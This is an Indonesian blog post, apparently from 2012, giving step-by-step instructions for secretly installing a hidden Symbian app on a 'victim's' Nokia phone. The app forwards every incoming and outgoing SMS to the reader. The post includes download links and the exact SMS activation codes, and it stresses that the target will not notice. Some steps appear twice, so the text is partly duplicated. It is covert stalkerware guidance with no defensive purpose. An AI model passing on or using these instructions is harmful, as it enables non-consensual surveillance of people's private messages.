7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya
selamat mencoba . . .
referensi :
forum cyberdos,
hehehehehehe .
oke langsung saja.
syarat:
# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis
hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis
Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
1. download smsanywherelite.sis untuk software menyadap.
direct link :
http://7c3e65c9.linkbucks.com/?lurl=http%3A%2F%2Fwww.wireless-labs.com%2Fdownload%2FSmsAnywhere_S60_2_0_v_1_4_1.SIS
kalau tidak bisa disitu, silahkan download di :
http://www.ziddu.com/download/3233238/smsanywherelite_s60_2_0_v_1_1_0.sis.zip.html
2. Masukkan aplikasi symbian itu di HP anda dan korban
3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
4. Siapkan hp/ponsel korban anda
5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya
selamat mencoba . . .
referensi :
forum cyberdos,
Kamis, 19 Januari 2012
Langganan:
Postingan (Atom)